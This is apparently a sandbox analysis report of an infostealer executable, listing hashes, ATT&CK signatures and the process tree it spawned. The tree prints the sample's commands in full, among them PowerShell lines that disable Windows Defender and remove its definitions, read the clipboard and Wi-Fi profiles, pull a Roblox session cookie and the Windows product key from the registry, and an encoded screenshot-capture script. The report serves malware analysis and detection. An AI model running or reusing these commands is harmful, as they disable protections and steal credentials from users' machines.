Resubmissions

24/02/2025, 22:28

250224-2dt8ea1mx6 10

24/02/2025, 15:23

250224-ssydyazkv6 10

20/02/2025, 14:31

250220-rv44tsxjgj 10

04/02/2025, 00:26

250204-arb57szqcn 10

27/01/2025, 01:20

250127-bp95wsvjan 10

26/01/2025, 19:21

250126-x2xwzszrgw 10

26/01/2025, 18:18

250126-wxts4azmgr 10

23/01/2025, 23:13

250123-27gjeaxqgs 10

23/01/2025, 17:13

250123-vrtqgawqdz 10

Analysis

  • max time kernel
    13s
  • max time network
    15s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/02/2025, 15:23

General

  • Target

    HeilHitler.exe

  • Size

    6.0MB

  • MD5

    aeab677edfb0b7838ad440c071a04965

  • SHA1

    9855bbfe1e4d729853c1d3fd5e51a6d767cf8203

  • SHA256

    e465cccde051595262dc76359e4a06279341b4292901a49061cf9fa1386119df

  • SHA512

    567dd7cd29f4c35e0d99470628535fddb6f801ce36708003d9a6cc95a0933b613e221c07347040746e4ee174322c02b8da4c59828b79a963ff69c9378a735849

  • SSDEEP

    98304:0bEtdFBg0amaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0BMnM3JfFTW:0SFceN/FJMIDJf0gsAGK4R0un+TW

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 53 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe
    "C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe
      "C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HeilHitler.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3768
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3940
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3844
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4804
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1708
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3044
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3624
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:5116
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1892
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pux2a2sh\pux2a2sh.cmdline"
              5⤵
                PID:3740
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA88.tmp" "c:\Users\Admin\AppData\Local\Temp\pux2a2sh\CSCA28C42AE6FB04DF69F3C9A3EE1EA3FC.TMP"
                  6⤵
                    PID:4788
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3656
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4976
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3540
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3148
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4036
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3056
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3284
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4320
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:828
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:3636
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:4724
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:4288
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4720
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:3532
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3648
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:3324
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:3056
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"fuck123" "C:\Users\Admin\AppData\Local\Temp\k2f8B.zip" *"
                                    3⤵
                                      PID:3268
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"fuck123" "C:\Users\Admin\AppData\Local\Temp\k2f8B.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:4392
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:4992
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4612
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:4300
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:276
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:3740
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:2268
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:224
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:1620
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:3720
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:3812
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:1116
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                          PID:4636

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    74e4a39ae145a98de20041613220dfed

                                                    SHA1

                                                    ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                    SHA256

                                                    2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                    SHA512

                                                    96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    944B

                                                    MD5

                                                    2e8eb51096d6f6781456fef7df731d97

                                                    SHA1

                                                    ec2aaf851a618fb43c3d040a13a71997c25bda43

                                                    SHA256

                                                    96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                                                    SHA512

                                                    0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    944B

                                                    MD5

                                                    7d760ca2472bcb9fe9310090d91318ce

                                                    SHA1

                                                    cb316b8560b38ea16a17626e685d5a501cd31c4a

                                                    SHA256

                                                    5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

                                                    SHA512

                                                    141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

